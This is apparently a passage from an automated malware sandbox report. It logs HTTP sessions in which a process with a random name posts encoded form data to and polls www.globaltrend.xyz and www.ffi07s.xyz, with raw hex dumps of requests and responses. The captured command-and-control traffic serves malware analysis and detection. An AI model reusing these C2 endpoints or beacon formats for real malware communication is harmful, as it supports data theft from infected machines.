                                    Data Ascii: /><path d="M982,261a6.941,6.941,0,0,0-3.527.964L973.4,255.2a1,1,0,1,0-1.6,1.2l5.109,6.812A6.99,6.99,0,1,0,982,261Zm0,12a5,5,0,1,1,5-5A5.006,5.006,0,0,1,982,273Z" fill="#226d7a"/><path d="M19,32H11V24a1,1,0,0,0-2,0v8H1a1,1,0,0,0,0,2H9v8a1,1,0,0
                                    Jul 11, 2024 15:06:54.463093996 CEST1236INData Raw: 2e 32 33 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 34 35 2e 37 34 32 20 39 38 2e 34 32 39 20 31 34 37 2e 35 38 31 20 39 36 2e 33 31 36 20 31 34 35 2e 37 34 32 20 39 34 2e 32 30 32 20 31
                                    Data Ascii: .235" fill="#fff"/><polygon points="145.742 98.429 147.581 96.316 145.742 94.202 143.904 96.316 145.742 98.429" fill="#fff"/><polygon points="145.742 86.624 147.581 84.51 145.742 82.396 143.904 84.51 145.742 86.624" fill="#fff"/><polygon point
                                    Jul 11, 2024 15:06:54.467915058 CEST1236INData Raw: 36 2e 32 38 38 20 38 32 2e 33 39 36 20 31 36 34 2e 34 35 20 38 34 2e 35 31 20 31 36 36 2e 32 38 38 20 38 36 2e 36 32 34 20 31 36 38 2e 31 32 38 20 38 34 2e 35 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e
                                    Data Ascii: 6.288 82.396 164.45 84.51 166.288 86.624 168.128 84.51" fill="#fff"/><polygon points="176.563 129.621 174.724 131.734 176.563 133.848 178.401 131.734 176.563 129.621" fill="#fff"/><polygon points="176.563 117.814 174.724 119.928 176.563 122.04


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    17192.168.2.649740188.114.96.3806784C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 11, 2024 15:06:59.761285067 CEST847OUTPOST /srh8/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.globaltrend.xyz
                                    Content-Length: 207
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.globaltrend.xyz
                                    Referer: http://www.globaltrend.xyz/srh8/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 46 53 77 6f 4f 6d 71 72 38 59 6f 46 4d 68 41 43 58 63 44 47 53 4d 4a 4c 57 50 30 4e 37 6b 39 38 4e 54 64 4c 46 55 79 51 76 48 31 36 42 73 6d 74 57 47 6f 63 42 4e 75 6c 38 39 37 30 55 66 47 36 74 71 74 6c 62 7a 64 36 46 6f 59 76 6e 36 4a 54 59 7a 2f 76 54 58 48 35 43 2f 64 79 52 55 6d 57 52 65 49 47 6b 55 59 35 73 56 59 44 35 41 6a 46 55 67 62 50 77 42 46 57 38 57 57 78 52 68 55 78 58 6b 68 49 51 67 41 61 37 4d 53 34 54 62 66 53 37 65 52 6f 74 59 6c 48 37 6c 6a 47 31 4d 32 4c 47 7a 4c 36 71 41 4a 6a 62 4b 54 39 79 51 53 58 75 69 4a 66 6a 6f 50 49 54 57 41 41 72 58 36 69 2b 72 4b 36 7a 79 67 39 4c 4b 59 67
                                    Data Ascii: bB=FSwoOmqr8YoFMhACXcDGSMJLWP0N7k98NTdLFUyQvH16BsmtWGocBNul8970UfG6tqtlbzd6FoYvn6JTYz/vTXH5C/dyRUmWReIGkUY5sVYD5AjFUgbPwBFW8WWxRhUxXkhIQgAa7MS4TbfS7eRotYlH7ljG1M2LGzL6qAJjbKT9yQSXuiJfjoPITWAArX6i+rK6zyg9LKYg
                                    Jul 11, 2024 15:07:00.483117104 CEST661INHTTP/1.1 301 Moved Permanently
                                    Date: Thu, 11 Jul 2024 13:07:00 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Location: http://www.globaltrend.xyz
                                    X-Powered-By: PHP/7.4.6
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NpSRvluX1cFWqa5lkkXHCUqtYOCH0yCdwYXgQSldA4EyM6x%2BgoA3rgFZFA8xg54jgo%2FwsrDGnH4eAYXy0JCoKy5xXocFBj89bcGs%2FGpDRc6frOknQNWRz4%2BrKXSh7SpXFuEB0NBf"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8a190395ebe143fd-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    18192.168.2.649741188.114.96.3806784C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 11, 2024 15:07:02.361686945 CEST871OUTPOST /srh8/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.globaltrend.xyz
                                    Content-Length: 231
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.globaltrend.xyz
                                    Referer: http://www.globaltrend.xyz/srh8/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 46 53 77 6f 4f 6d 71 72 38 59 6f 46 65 30 49 43 53 37 66 47 44 38 4a 4d 54 50 30 4e 67 30 39 34 4e 54 52 4c 46 56 47 2b 76 53 46 36 43 4d 32 74 58 48 6f 63 52 64 75 6c 75 64 37 6f 4a 50 47 68 74 71 70 74 62 78 4a 36 46 6f 38 76 6e 37 35 54 59 45 4c 6f 53 48 48 2f 61 50 64 30 4f 6b 6d 57 52 65 49 47 6b 55 39 6b 73 56 77 44 35 54 72 46 62 68 62 49 7a 42 46 56 73 6d 57 78 41 78 55 39 58 6b 68 71 51 69 6b 38 37 4f 61 34 54 61 76 53 2f 66 52 72 2b 34 6c 46 33 31 69 35 79 70 54 42 4a 67 32 67 31 44 74 6e 4f 39 4c 68 33 6d 54 4e 79 52 4a 38 78 34 76 4b 54 55 59 79 72 33 36 49 38 72 79 36 68 6c 73 61 45 2b 39 44 39 6f 52 5a 50 6c 4a 4c 53 32 79 61 30 6d 73 52 4b 48 77 59 4a 51 3d 3d
                                    Data Ascii: bB=FSwoOmqr8YoFe0ICS7fGD8JMTP0Ng094NTRLFVG+vSF6CM2tXHocRdulud7oJPGhtqptbxJ6Fo8vn75TYELoSHH/aPd0OkmWReIGkU9ksVwD5TrFbhbIzBFVsmWxAxU9XkhqQik87Oa4TavS/fRr+4lF31i5ypTBJg2g1DtnO9Lh3mTNyRJ8x4vKTUYyr36I8ry6hlsaE+9D9oRZPlJLS2ya0msRKHwYJQ==


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    19192.168.2.649742188.114.96.3806784C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 11, 2024 15:07:05.394306898 CEST1884OUTPOST /srh8/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.globaltrend.xyz
                                    Content-Length: 1243
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.globaltrend.xyz
                                    Referer: http://www.globaltrend.xyz/srh8/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 46 53 77 6f 4f 6d 71 72 38 59 6f 46 65 30 49 43 53 37 66 47 44 38 4a 4d 54 50 30 4e 67 30 39 34 4e 54 52 4c 46 56 47 2b 76 53 4e 36 42 2b 4f 74 52 67 30 63 53 64 75 6c 31 64 37 72 4a 50 48 78 74 71 52 70 62 78 31 45 46 75 34 76 6e 5a 78 54 4a 51 58 6f 59 48 48 2f 47 2f 64 78 52 55 6e 65 52 65 59 61 6b 55 4e 6b 73 56 77 44 35 53 37 46 53 51 62 49 31 42 46 57 38 57 57 39 52 68 55 5a 58 67 30 58 51 69 78 42 34 2b 36 34 51 36 2f 53 39 4e 70 72 39 59 6c 44 32 46 69 68 79 70 58 43 4a 67 71 61 31 43 4a 42 4f 36 37 68 33 52 65 43 6f 7a 39 39 72 5a 66 5a 4b 6a 38 58 6f 79 62 36 34 6f 36 77 70 6a 63 75 48 38 35 30 36 4d 4a 31 4d 33 30 51 63 6c 6d 59 37 6d 52 6d 44 57 74 6e 4b 4a 4c 59 6d 54 46 63 41 67 77 4b 33 2b 45 51 66 46 44 46 38 44 46 76 64 66 42 7a 52 75 65 48 4e 76 6b 71 6e 4e 5a 43 7a 33 4a 4e 61 6c 2f 4f 4c 71 70 53 4b 45 52 59 43 63 6e 74 43 67 61 69 49 43 70 53 65 4d 36 46 4a 72 47 64 68 2f 30 62 52 4a 44 71 73 63 4e 4b 44 36 32 4f 47 57 37 31 2b 33 73 68 41 2b 6a 72 53 52 6d 32 4b 53 56 [TRUNCATED]
                                    Data Ascii: bB=FSwoOmqr8YoFe0ICS7fGD8JMTP0Ng094NTRLFVG+vSN6B+OtRg0cSdul1d7rJPHxtqRpbx1EFu4vnZxTJQXoYHH/G/dxRUneReYakUNksVwD5S7FSQbI1BFW8WW9RhUZXg0XQixB4+64Q6/S9Npr9YlD2FihypXCJgqa1CJBO67h3ReCoz99rZfZKj8Xoyb64o6wpjcuH8506MJ1M30QclmY7mRmDWtnKJLYmTFcAgwK3+EQfFDF8DFvdfBzRueHNvkqnNZCz3JNal/OLqpSKERYCcntCgaiICpSeM6FJrGdh/0bRJDqscNKD62OGW71+3shA+jrSRm2KSVWGeMnHmGBKFwDmC93cxKJglGKPqa8ZHvPi/rnIKK+71MeuR8vPsqxC3M/lwWqTNK856VFF/x+AH8y2k5XSdo6+emi8zN6Z/WXF+Yb4RCyuoyKN5LTmUznWfC+TYDWlwbecB9PnMznJ313AJd3l9pQsvWicOl59PvPlLrmPb0d6oI6fE+meNw/6oUy8x4K8FDwl9cF/9HRlQs1dWwv3Jt7kNELZTb59E5rUqzy2951nr2WqtZBocPS25PjG9OxOdVsyOn7hYAqKUiOLfFoM2MuOSDDIECgQ4JlkeCWcqHzzI2UxJPaC677Q/pL8ha61ABZFmqxyJ0YfGBprJpRT//TI9Z1j2VUg8Aaiu5Do+750DURKJhdKJTkywQiKDVTonBUQSzGWXCGF+dJ9kV1bJDjGACL2wNEaQtHZXnqPNIaeTSV3RFKiX7RKcrmbYFY7/1zSIJm5dGRThxUY0a4OtQ5R+rdWBtixmH2mWfn/KI6pCAM2YtFU2aTCf1EOxbyWGVNc/C30I4wnAzHucYoXqDofgDA4iGAObUx/Ue2Y7DYKTYx2uMTv34JCL4hw7NOJXadsnuXfKvs/R/xZorPuUl3X9He1E6rUzqSQxQsBe08dEMHdKobIU/i3oFAvwr9AhwUJiJtAJ1s//0Nwh6EecyHdqDdfJmyJvpXA [TRUNCATED]
                                    Jul 11, 2024 15:07:06.076211929 CEST653INHTTP/1.1 301 Moved Permanently
                                    Date: Thu, 11 Jul 2024 13:07:06 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Location: http://www.globaltrend.xyz
                                    X-Powered-By: PHP/7.4.6
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U9KKbeknPedlkAJZl2vNMDYuSBGYfNcqyehqlexSdUBzYblC9psb1Yb1oOzUj9y9c6I65tvY0DwnBZL0x3OPutWMuBk1Gmj4kLknxd1Va5oqY4xNZZI2HPKrboZDsDpVunlssPzy"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8a1903b91c2218b4-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    20192.168.2.649743188.114.96.3806784C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 11, 2024 15:07:07.976079941 CEST582OUTGET /srh8/?bB=IQYINTaWkaojOw8AeeCEPfEIeYkq+BJ0MxZ2KDKAvD89Td2DcEp1Lez+9d6wDeiGuMtHeyxXV+kcq5RzRjH8Xk/GO/xLSHXoOvEtt1Rw61dZpGC5bSCzmgdK2DCxRFg+STwXV1g=&GX=iP9xCL HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Host: www.globaltrend.xyz
                                    Connection: close
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Jul 11, 2024 15:07:09.809554100 CEST659INHTTP/1.1 301 Moved Permanently
                                    Date: Thu, 11 Jul 2024 13:07:09 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Location: http://www.globaltrend.xyz
                                    X-Powered-By: PHP/7.4.6
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dba%2BW30romTG2H04JX%2FHk8zZN%2BVzofZ5YC50IqsbqoWcfRTvMTk1HYHs8mArO6bd2WYuLXoMzNugpX68D8abXN5DqkEwlkDuTXGuRSRHnRMewXUHwNbAOQ1ZpVpvCgRn7aL6JKhD"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8a1903c989080f71-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    21192.168.2.649745188.114.97.3806784C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 11, 2024 15:07:14.913315058 CEST832OUTPOST /y7ar/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.ffi07s.xyz
                                    Content-Length: 207
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.ffi07s.xyz
                                    Referer: http://www.ffi07s.xyz/y7ar/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 42 70 6a 4d 31 37 35 33 64 39 55 34 33 61 45 4b 6d 42 51 30 5a 41 47 4a 63 31 75 6e 53 65 57 77 6b 38 69 68 37 34 33 47 71 71 35 68 71 75 39 58 49 69 42 74 6c 49 69 64 49 5a 4b 43 63 54 68 51 50 4a 62 70 38 6f 77 67 6f 6a 41 53 48 50 42 43 42 59 65 65 6e 73 4d 70 56 63 65 4d 32 58 5a 6f 36 53 50 62 46 50 38 50 33 4a 42 76 66 39 76 67 63 66 73 4c 59 7a 6a 7a 7a 50 53 74 79 2f 4e 39 67 75 30 66 74 34 7a 4e 2b 46 33 6e 71 6f 4a 4a 2b 30 56 39 6f 69 67 47 6e 6e 4c 33 4f 78 70 36 72 37 48 79 69 36 37 39 74 48 53 4c 4f 72 63 73 5a 67 68 76 57 31 49 68 58 72 55 41 55 35 51 73 4f 52 74 33 2f 42 58 69 42 4d 6f 66
                                    Data Ascii: bB=BpjM1753d9U43aEKmBQ0ZAGJc1unSeWwk8ih743Gqq5hqu9XIiBtlIidIZKCcThQPJbp8owgojASHPBCBYeensMpVceM2XZo6SPbFP8P3JBvf9vgcfsLYzjzzPSty/N9gu0ft4zN+F3nqoJJ+0V9oigGnnL3Oxp6r7Hyi679tHSLOrcsZghvW1IhXrUAU5QsORt3/BXiBMof
                                    Jul 11, 2024 15:07:15.810538054 CEST894INHTTP/1.1 404 Not Found
                                    Date: Thu, 11 Jul 2024 13:07:15 GMT
                                    Content-Type: text/html; charset=us-ascii
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TIuATv8dZouRSE7GG6Hoo2F8GW85N3HReupfIGaKyFiYyX4zZxwl%2BMRUPUPlfGgT%2FU4CTYGWEQm95nYCkWueEFEt2DO%2Bupx%2FLRwU1a2UTJw9jrrNII%2BzowhuBajXopOj7w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8a1903f4a91e43f7-EWR
                                    Content-Encoding: gzip
                                    alt-svc: h3=":443"; ma=86400
                                    Data Raw: 66 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f cb 6e 83 30 10 45 f7 48 fc c3 d4 7b 98 34 61 d5 1a 4b 09 b8 02 89 3c 5a 39 ad b2 8c c0 ad 91 5a 4c ed 41 b4 7f 5f 01 5d 64 79 e7 6a ce d1 e5 77 f9 31 53 97 93 84 42 ed 2b 38 9d 77 55 99 01 8b 10 df 36 19 62 ae f2 a5 48 e2 d5 3d a2 3c 30 66 88 fa 07 c4 71 1c e3 71 13 5b f7 81 ea 05 0d 7d 7d 26 e8 c9 b5 35 c5 0d 35 4c 84 01 9f 1e 05 2f e4 36 17 5c 95 aa 92 e2 60 09 9e ec d0 35 1c 97 43 18 f0 bd 54 5b 28 94 3a 45 f2 f9 5c be a6 2c b3 1d e9 8e 22 f5 db 6b 06 ff 29 65 a4 7f 68 f6 3c 42 6d ae ce 6b 4a 07 1f 5d 7d dd b6 4c 70 9c 35 61 c0 77 c7 fc 22 b8 59 df ba cc 7a 6a 8c 13 bc 17 93 09 a4 73 d6 41 b2 4a 62 50 46 83 d3 df 83 f6 a4 1b 70 da db c1 d5 1a 5a 0f 9d 25 78 9f 00 31 c7 7e 02 e0 c2 c6 79 d7 1f 00 00 00 ff ff 0d 0a 63 0d 0a e3 e5 02 00 c8 32 24 ab 3b 01 00 00 0d 0a 30 0d 0a 0d 0a
                                    Data Ascii: fcLn0EH{4aK<Z9ZLA_]dyjw1SB+8wU6bH=<0fqq[}}&55L/6\`5CT[(:E\,"k)eh<BmkJ]}Lp5aw"YzjsAJbPFpZ%x1~yc2$;0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    22192.168.2.649746188.114.97.3806784C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 11, 2024 15:07:17.488663912 CEST856OUTPOST /y7ar/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.ffi07s.xyz
                                    Content-Length: 231
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.ffi07s.xyz
                                    Referer: http://www.ffi07s.xyz/y7ar/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 42 70 6a 4d 31 37 35 33 64 39 55 34 32 2b 34 4b 72 41 51 30 4d 51 47 4b 58 56 75 6e 59 2b 57 30 6b 38 75 68 37 35 7a 57 71 5a 64 68 71 50 74 58 4a 6e 74 74 67 49 69 64 44 35 4b 48 59 54 68 58 50 4a 47 55 38 70 38 67 6f 6a 55 53 48 4c 4a 43 42 76 43 52 6b 63 4d 72 63 38 65 30 79 58 5a 6f 36 53 50 62 46 50 42 6b 33 4a 4a 76 66 4e 2f 67 64 37 34 4b 47 6a 6a 79 30 50 53 74 34 66 4d 32 67 75 31 79 74 38 7a 6e 2b 48 50 6e 71 70 35 4a 2f 6d 39 2b 6d 69 67 63 36 33 4b 47 65 68 67 57 71 4c 65 54 69 4a 65 51 78 58 43 6f 43 39 64 32 46 54 68 4d 45 6c 6f 6a 58 70 4d 79 55 5a 51 47 4d 52 56 33 74 57 62 46 4f 34 4e 38 36 77 45 2f 38 55 63 79 57 75 4b 46 39 46 31 4e 46 79 73 4e 5a 41 3d 3d
                                    Data Ascii: bB=BpjM1753d9U42+4KrAQ0MQGKXVunY+W0k8uh75zWqZdhqPtXJnttgIidD5KHYThXPJGU8p8gojUSHLJCBvCRkcMrc8e0yXZo6SPbFPBk3JJvfN/gd74KGjjy0PSt4fM2gu1yt8zn+HPnqp5J/m9+migc63KGehgWqLeTiJeQxXCoC9d2FThMElojXpMyUZQGMRV3tWbFO4N86wE/8UcyWuKF9F1NFysNZA==
                                    Jul 11, 2024 15:07:18.354121923 CEST888INHTTP/1.1 404 Not Found
                                    Date: Thu, 11 Jul 2024 13:07:18 GMT
                                    Content-Type: text/html; charset=us-ascii
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FKngYmsFnyWPrQW5HvSXTo%2B3EsE0VN3HFxM261%2BqumjblzHNrCY7DxL325PBFvlvxKC5Iigd5ZI9ujB99Efw7b28M0ejJ8UIOUdAm734xPoGSazRIla2c6JKmXNyuM%2F1jw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8a190404a89719cb-EWR
                                    Content-Encoding: gzip
                                    alt-svc: h3=":443"; ma=86400
                                    Data Raw: 31 30 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f cb 6e 83 30 10 45 f7 48 fc c3 d4 7b 98 34 61 d5 1a 4b 09 b8 02 89 3c 5a 39 ad b2 8c c0 ad 91 5a 4c ed 41 b4 7f 5f 01 5d 64 79 e7 6a ce d1 e5 77 f9 31 53 97 93 84 42 ed 2b 38 9d 77 55 99 01 8b 10 df 36 19 62 ae f2 a5 48 e2 d5 3d a2 3c 30 66 88 fa 07 c4 71 1c e3 71 13 5b f7 81 ea 05 0d 7d 7d 26 e8 c9 b5 35 c5 0d 35 4c 84 01 9f 1e 05 2f e4 36 17 5c 95 aa 92 e2 60 09 9e ec d0 35 1c 97 43 18 f0 bd 54 5b 28 94 3a 45 f2 f9 5c be a6 2c b3 1d e9 8e 22 f5 db 6b 06 ff 29 65 a4 7f 68 f6 3c 42 6d ae ce 6b 4a 07 1f 5d 7d dd b6 4c 70 9c 35 61 c0 77 c7 fc 22 b8 59 df ba cc 7a 6a 8c 13 bc 17 93 09 a4 73 d6 41 b2 4a 62 50 46 83 d3 df 83 f6 a4 1b 70 da db c1 d5 1a 5a 0f 9d 25 78 9f 00 31 c7 7e 02 e0 c2 c6 79 d7 1f 00 00 00 ff ff e3 e5 02 00 c8 32 24 ab 3b 01 00 00 0d 0a 30 0d 0a 0d 0a
                                    Data Ascii: 108Ln0EH{4aK<Z9ZLA_]dyjw1SB+8wU6bH=<0fqq[}}&55L/6\`5CT[(:E\,"k)eh<BmkJ]}Lp5aw"YzjsAJbPFpZ%x1~y2$;0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    23192.168.2.649747188.114.97.3806784C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 11, 2024 15:07:20.067791939 CEST1869OUTPOST /y7ar/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.ffi07s.xyz
                                    Content-Length: 1243
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.ffi07s.xyz
                                    Referer: http://www.ffi07s.xyz/y7ar/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 42 70 6a 4d 31 37 35 33 64 39 55 34 32 2b 34 4b 72 41 51 30 4d 51 47 4b 58 56 75 6e 59 2b 57 30 6b 38 75 68 37 35 7a 57 71 5a 56 68 71 34 74 58 49 41 5a 74 6e 49 69 64 41 35 4b 47 59 54 68 47 50 4a 4f 59 38 70 41 65 6f 67 73 53 42 5a 52 43 49 39 71 52 2f 73 4d 72 65 38 65 50 32 58 5a 48 36 53 66 66 46 4c 68 6b 33 4a 4a 76 66 4c 37 67 55 50 73 4b 45 6a 6a 7a 7a 50 53 66 79 2f 4d 65 67 71 59 48 74 38 6e 64 2f 7a 7a 6e 6b 70 70 4a 35 54 4a 2b 35 79 67 43 37 33 4b 65 65 68 38 4a 71 4c 79 78 69 49 37 4c 78 52 2b 6f 41 37 51 49 52 48 52 61 46 6e 59 76 48 70 63 47 59 39 41 6b 47 67 78 34 75 56 7a 33 42 61 45 58 2b 6e 34 72 70 32 70 68 57 75 79 32 78 53 68 53 4f 67 70 36 4b 6a 69 46 32 57 2f 6c 39 6b 75 35 61 38 39 79 7a 77 45 32 6b 2f 75 42 71 6e 6f 41 71 61 61 52 55 44 75 31 45 35 6b 73 71 55 30 43 79 45 5a 6c 31 33 68 69 62 75 53 6f 4e 44 64 4e 55 63 4a 32 58 34 6f 49 41 52 66 75 54 70 4a 49 76 50 54 6f 54 4b 43 55 57 6f 74 65 2f 49 6e 51 7a 56 74 6e 30 71 70 79 68 72 51 56 32 2f 4d 67 55 30 32 [TRUNCATED]
